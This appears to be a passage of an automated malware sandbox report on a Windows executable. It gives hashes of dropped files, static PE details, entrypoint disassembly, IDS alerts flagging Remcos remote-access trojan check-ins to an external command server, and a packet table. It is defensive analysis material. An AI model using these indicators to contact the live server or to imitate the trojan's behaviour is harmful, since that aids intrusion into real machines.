                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):979567142
                                                                                                                                                Entropy (8bit):0.05590638890163692
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:
                                                                                                                                                MD5:599A413EE85CC3A8A223C83230DC8D54
                                                                                                                                                SHA1:5D6E856794B3AF1D96AB0319350856BD5BCE4BE6
                                                                                                                                                SHA-256:CAAB3F404A2CE6D4EFCBFEC97172CBC17D2E4A8D128F4BB42BBE677947DBB425
                                                                                                                                                SHA-512:6EF58AC644BE1B60F2E65851CEF60E81D772212CB9B127613DDB77A941B555868AD3B616B173574D2129AC5F874650D485E520AE62287C939B5581C9E6D0CC32
                                                                                                                                                Malicious:false
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: fIPSLgT0lO.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: 3XSXmrEOw7.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ozfqy8Ms6t.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: pPLwX9wSrD.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: hCJ8gK9kNn.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\4JwhvqLe8n.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):979567344
                                                                                                                                                Entropy (8bit):0.03687271612861637
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:
                                                                                                                                                MD5:562A60041F05642EC1385D4485B2367A
                                                                                                                                                SHA1:73084B32C52D7B55DEAC6F80C550F2F6B1E43998
                                                                                                                                                SHA-256:7B4BE96B41FCEAC779AFE4F8A90E29727DC069E2ABAB8978652A9B5A5176D884
                                                                                                                                                SHA-512:8E918EA5F916947F3FDD4F81900CAA6B969CD5D3F062B5928B72A4BA1EEE1B5DFABDFE7DA2F8EA5A3DB4FED261907365F7456CB2D428852B04DC2EA4EDB9BF7F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8)4.|HZ.|HZ.|HZ.g..jHZ.g...HZ.g..GHZ.u0.qHZ.|H[..HZ.g...kHZ.g...}HZ.g..}HZ.Rich|HZ.........................PE..L......d.................T... &......X.......p....@...........................(...........@.....................................x....@...s%..........~..`(......."...r..............................P...@............p...............................text....`.......T.................. ..`.rdata.......p.......X..............@..@.data....@..........................@....rsrc....s%..@...t%.................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):6.05725668491521
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:4JwhvqLe8n.exe
                                                                                                                                                File size:2'652'160 bytes
                                                                                                                                                MD5:b58e300ca8077adc4094e9044bcdbbc8
                                                                                                                                                SHA1:abc3b46626e17e22b744b9fe44833919255121ce
                                                                                                                                                SHA256:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9
                                                                                                                                                SHA512:abfae0cd1d5b9a1475449f1f4ece4c72d7731bf1e01e721ebf31e656c65406b430f87b65334a9e9150530357f58b6ea7d31b5d55b4ae9800ad64d9bdc5998ea3
                                                                                                                                                SSDEEP:24576:Mo48sSW8kD+xpdPChyjn4CqnlwRsdkoAgEsJUtDkMvF9Am:p4bIk6qhyL4osdkovEsJUFxPJ
                                                                                                                                                TLSH:45C56CC6D940C847F97A19FDE91A78F0422F3FB9D93EA06B9B907F2DB231AC10415952
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8)4.|HZ.|HZ.|HZ.g...jHZ.g....HZ.g...GHZ.u0..qHZ.|H[..HZ.g...kHZ.g...}HZ.g...}HZ.Rich|HZ.........................PE..L......d...

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:070b71b030211f88

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x415891
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x64ECE0A8 [Mon Aug 28 18:00:08 2023 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:1
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:1
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                Import Hash:fba9a06cd911d183f0aec1159c439b07

                                                                                                                                                Authenticode Signature

                                                                                                                                                Signature Valid:
                                                                                                                                                Signature Issuer:
                                                                                                                                                Signature Validation Error:
                                                                                                                                                Error Number:
                                                                                                                                                Not Before, Not After
                                                                                                                                                  Subject Chain
                                                                                                                                                    Version:
                                                                                                                                                    Thumbprint MD5:
                                                                                                                                                    Thumbprint SHA-1:
                                                                                                                                                    Thumbprint SHA-256:
                                                                                                                                                    Serial:

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    call 00007F6FF874C94Dh
                                                                                                                                                    jmp 00007F6FF8745C0Eh
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    mov edx, dword ptr [esp+0Ch]
                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                    test edx, edx
                                                                                                                                                    je 00007F6FF8745DEBh
                                                                                                                                                    xor eax, eax
                                                                                                                                                    mov al, byte ptr [esp+08h]
                                                                                                                                                    test al, al
                                                                                                                                                    jne 00007F6FF8745D98h
                                                                                                                                                    cmp edx, 00000080h
                                                                                                                                                    jc 00007F6FF8745D90h
                                                                                                                                                    cmp dword ptr [00432CC0h], 00000000h
                                                                                                                                                    je 00007F6FF8745D87h
                                                                                                                                                    jmp 00007F6FF874C9B2h
                                                                                                                                                    push edi
                                                                                                                                                    mov edi, ecx
                                                                                                                                                    cmp edx, 04h
                                                                                                                                                    jc 00007F6FF8745DB3h
                                                                                                                                                    neg ecx
                                                                                                                                                    and ecx, 03h
                                                                                                                                                    je 00007F6FF8745D8Eh
                                                                                                                                                    sub edx, ecx
                                                                                                                                                    mov byte ptr [edi], al
                                                                                                                                                    add edi, 01h
                                                                                                                                                    sub ecx, 01h
                                                                                                                                                    jne 00007F6FF8745D78h
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    shl eax, 08h
                                                                                                                                                    add eax, ecx
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    shl eax, 10h
                                                                                                                                                    add eax, ecx
                                                                                                                                                    mov ecx, edx
                                                                                                                                                    and edx, 03h
                                                                                                                                                    shr ecx, 02h
                                                                                                                                                    je 00007F6FF8745D88h
                                                                                                                                                    rep stosd
                                                                                                                                                    test edx, edx
                                                                                                                                                    je 00007F6FF8745D8Ch
                                                                                                                                                    mov byte ptr [edi], al
                                                                                                                                                    add edi, 01h
                                                                                                                                                    sub edx, 01h
                                                                                                                                                    jne 00007F6FF8745D78h
                                                                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                                                                    pop edi
                                                                                                                                                    ret
                                                                                                                                                    mov eax, dword ptr [esp+04h]
                                                                                                                                                    ret
                                                                                                                                                    mov edi, edi
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                    push ebx
                                                                                                                                                    xor ebx, ebx
                                                                                                                                                    cmp ecx, ebx
                                                                                                                                                    jbe 00007F6FF8745D9Dh
                                                                                                                                                    push FFFFFFE0h
                                                                                                                                                    xor edx, edx
                                                                                                                                                    pop eax
                                                                                                                                                    div ecx
                                                                                                                                                    cmp eax, dword ptr [ebp+10h]
                                                                                                                                                    jnc 00007F6FF8745D91h
                                                                                                                                                    call 00007F6FF874484Eh
                                                                                                                                                    mov dword ptr [eax], 0000000Ch
                                                                                                                                                    xor eax, eax
                                                                                                                                                    jmp 00007F6FF8745DC3h
                                                                                                                                                    imul ecx, dword ptr [ebp+10h]
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    mov esi, ecx
                                                                                                                                                    cmp dword ptr [ebp+08h], ebx
                                                                                                                                                    je 00007F6FF8745D8Dh
                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                    call 00007F6FF874746Eh

                                                                                                                                                    Rich Headers

                                                                                                                                                    Programming Language:
                                                                                                                                                    • [ASM] VS2010 SP1 build 40219
                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                    • [C++] VS2010 SP1 build 40219
                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                    • [LNK] VS2010 SP1 build 40219

                                                                                                                                                    Data Directories

                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2f4c40x78.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x2573d0.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xc7e000x2860.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000x22fc.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x272b00x1c.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c1500x40.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x270000x1bc.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                    Sections

                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x260000x25400322bee9ae1b5d94b5b2fb7fb5a6af11dFalse0.5403143351510067data6.613060638092758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0x270000x90000x900081a1c90b898ffbd833b6d78098a5839eFalse0.3275282118055556data4.397029732712187IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0x300000x40000x1c0084f180ff30a786befa816e36aabd66fcFalse0.2925502232142857data4.000425788178025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .rsrc0x340000x2573d00x257400922980e07f33f2cbed318f9698257843unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                    RT_BITMAP0x349240x1d4e8Device independent bitmap graphic, 200 x 200 x 24, image size 120000, resolution 3780 x 3780 px/m0.651107964011996
                                                                                                                                                    RT_BITMAP0x51e0c0x9ea4Device independent bitmap graphic, 483 x 21 x 32, image size 40572, resolution 3582 x 3582 px/m0.36169112577563284
                                                                                                                                                    RT_BITMAP0x5bcb00x50138PC bitmap, Windows 3.x format, 41447 x 2 x 40, image size 328097, cbSize 327992, bits offset 540.9418796799921949
                                                                                                                                                    RT_ICON0xabde80x3a48Device independent bitmap graphic, 60 x 120 x 32, image size 148800.1794906166219839
                                                                                                                                                    RT_ICON0xaf8300xcd63PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8217158941782841
                                                                                                                                                    RT_ICON0xbc5940x43db6PC bitmap, Windows 3.x format, 34872 x 2 x 46, image size 278651, cbSize 277942, bits offset 540.9944844607867829
                                                                                                                                                    RT_ICON0x10034c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.21341463414634146
                                                                                                                                                    RT_ICON0x1009b40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.271505376344086
                                                                                                                                                    RT_ICON0x100c9c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.36475409836065575
                                                                                                                                                    RT_ICON0x100e840x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.4864864864864865
                                                                                                                                                    RT_ICON0x100fac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.12366737739872068
                                                                                                                                                    RT_ICON0x101e540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.14620938628158844
                                                                                                                                                    RT_ICON0x1026fc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.16589861751152074
                                                                                                                                                    RT_ICON0x102dc40x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.16257225433526012
                                                                                                                                                    RT_ICON0x10332c0x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.018600023670740005
                                                                                                                                                    RT_ICON0x1453540x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.08858921161825727
                                                                                                                                                    RT_ICON0x1478fc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.12617260787992496
                                                                                                                                                    RT_ICON0x1489a40x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.1819672131147541
                                                                                                                                                    RT_ICON0x14932c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.26684397163120566
                                                                                                                                                    RT_ICON0x1497940x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.21341463414634146
                                                                                                                                                    RT_ICON0x149dfc0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.271505376344086
                                                                                                                                                    RT_ICON0x14a0e40x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.36475409836065575
                                                                                                                                                    RT_ICON0x14a2cc0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.4864864864864865
                                                                                                                                                    RT_ICON0x14a3f40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.12366737739872068
                                                                                                                                                    RT_ICON0x14b29c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.14620938628158844
                                                                                                                                                    RT_ICON0x14bb440x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.16589861751152074
                                                                                                                                                    RT_ICON0x14c20c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.16257225433526012
                                                                                                                                                    RT_ICON0x14c7740x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.018600023670740005
                                                                                                                                                    RT_ICON0x18e79c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.08858921161825727
                                                                                                                                                    RT_ICON0x190d440x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.12617260787992496
                                                                                                                                                    RT_ICON0x191dec0x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.1819672131147541
                                                                                                                                                    RT_ICON0x1927740x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.26684397163120566
                                                                                                                                                    RT_MENU0x192bdc0x4adataEnglishUnited States0.8648648648648649
                                                                                                                                                    RT_DIALOG0x192c280x10adataEnglishUnited States0.6804511278195489
                                                                                                                                                    RT_STRING0x192d340x70dataEnglishUnited States0.6785714285714286
                                                                                                                                                    RT_ACCELERATOR0x192da40x10dataEnglishUnited States1.25
                                                                                                                                                    RT_RCDATA0x192db40xf7eceDelphi compiled form 'TfPNGMessage'0.20263081707372316
                                                                                                                                                    RT_GROUP_ICON0x28ac840xbcdataEnglishUnited States0.5904255319148937
                                                                                                                                                    RT_GROUP_ICON0x28ad400xbcdataEnglishUnited States0.6117021276595744
                                                                                                                                                    RT_VERSION0x28adfc0x37cdataEnglishUnited States0.4226457399103139
                                                                                                                                                    RT_MANIFEST0x28b1780x255ASCII text, with very long lines (353), with CRLF line terminatorsEnglishUnited States0.4991624790619765

                                                                                                                                                    Imports

                                                                                                                                                    DLLImport
                                                                                                                                                    KERNEL32.dllFreeEnvironmentStringsW, CloseHandle, LocalFree, ResumeThread, lstrcpyW, FreeLibrary, LoadLibraryW, MultiByteToWideChar, GetProcAddress, Sleep, lstrcpynW, SetFilePointerEx, WriteFile, ReadFile, CreateFileW, FlushFileBuffers, GetFileSizeEx, RaiseException, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, GetLocaleInfoA, GetLocaleInfoW, SetFilePointer, AllocConsole, FreeConsole, GetStdHandle, lstrcmpiW, FormatMessageW, QueryPerformanceCounter, ReleaseSemaphore, CreateSemaphoreW, OpenSemaphoreW, GetConsoleMode, GetConsoleCP, RtlUnwind, GetSystemTimeAsFileTime, SetCurrentDirectoryW, FindResourceExW, GetLastError, GetStartupInfoW, lstrlenW, GetModuleFileNameW, GetEnvironmentStringsW, CreateProcessW, GetEnvironmentVariableW, GetCommandLineW, LockResource, SizeofResource, WideCharToMultiByte, LoadResource, FindResourceW, GetCurrentProcessId, GetTickCount, SetHandleCount, LCMapStringW, HeapCreate, IsProcessorFeaturePresent, GetStringTypeW, ExitProcess, HeapDestroy, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, GetProcessHeap, EncodePointer, DecodePointer, SetStdHandle, GetFileType, WriteConsoleW, HeapSetInformation, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId
                                                                                                                                                    USER32.dllGetDesktopWindow, MessageBoxW
                                                                                                                                                    ADVAPI32.dllRegQueryValueExW, RegOpenKeyW, IsTextUnicode, RegCreateKeyW, RegSetValueExW, RegCloseKey, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                                    SHELL32.dllCommandLineToArgvW
                                                                                                                                                    SHLWAPI.dllStrNCatW, PathFileExistsW, UrlEscapeW, UrlUnescapeW

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    EnglishUnited States

                                                                                                                                                    Network Behavior

                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2024-12-12T18:02:36.897207+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.549843181.131.217.2441842TCP
                                                                                                                                                    2024-12-12T18:02:38.178693+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1181.131.217.2441842192.168.2.549843TCP
                                                                                                                                                    2024-12-12T18:02:40.788175+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549850178.237.33.5080TCP

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Dec 12, 2024 18:01:54.335757017 CET4974330203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:01:54.455614090 CET3020349743181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:54.455719948 CET4974330203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:01:54.490761995 CET4974330203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:01:54.610713959 CET3020349743181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:54.610868931 CET4974330203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:01:54.762135029 CET3020349743181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:56.879446030 CET3020349743181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:56.932781935 CET4974330203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:01:57.117472887 CET3020349743181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:57.135288000 CET4974330203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:01:57.255625010 CET3020349743181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:57.255723000 CET4974330203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:01:57.541215897 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:01:57.541251898 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:57.541356087 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:01:57.651565075 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:01:57.651587963 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:59.294718027 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:59.294816971 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:01:59.299942017 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:01:59.299995899 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:59.300568104 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:59.373600006 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:01:59.419336081 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:59.992774010 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:59.992795944 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:59.992856979 CET44349750185.166.143.49192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:59.992952108 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:01:59.993047953 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:02:00.000117064 CET49750443192.168.2.5185.166.143.49
                                                                                                                                                    Dec 12, 2024 18:02:00.346141100 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:00.346179962 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:00.346285105 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:00.346719027 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:00.346733093 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:01.778599024 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:01.778740883 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:01.780723095 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:01.780735970 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:01.781035900 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:01.782644987 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:01.823332071 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.501832008 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.552388906 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.552409887 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.552506924 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.552537918 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.552598000 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.742605925 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.742630005 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.742655039 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.742892981 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.742913961 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.791912079 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.797441959 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.797463894 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.797507048 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.797523975 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.797538042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.797560930 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.797581911 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.804943085 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.805198908 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.805248976 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.805258989 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.901276112 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.910937071 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.910950899 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.911036968 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.911047935 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.949798107 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.949861050 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.949887037 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.949903011 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.949932098 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.949944019 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.949949980 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.949964046 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.949985027 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.950031042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.950074911 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.985064983 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.985073090 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.985131979 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.985133886 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:02.985158920 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:02.985183001 CET49760443192.168.2.53.5.24.44
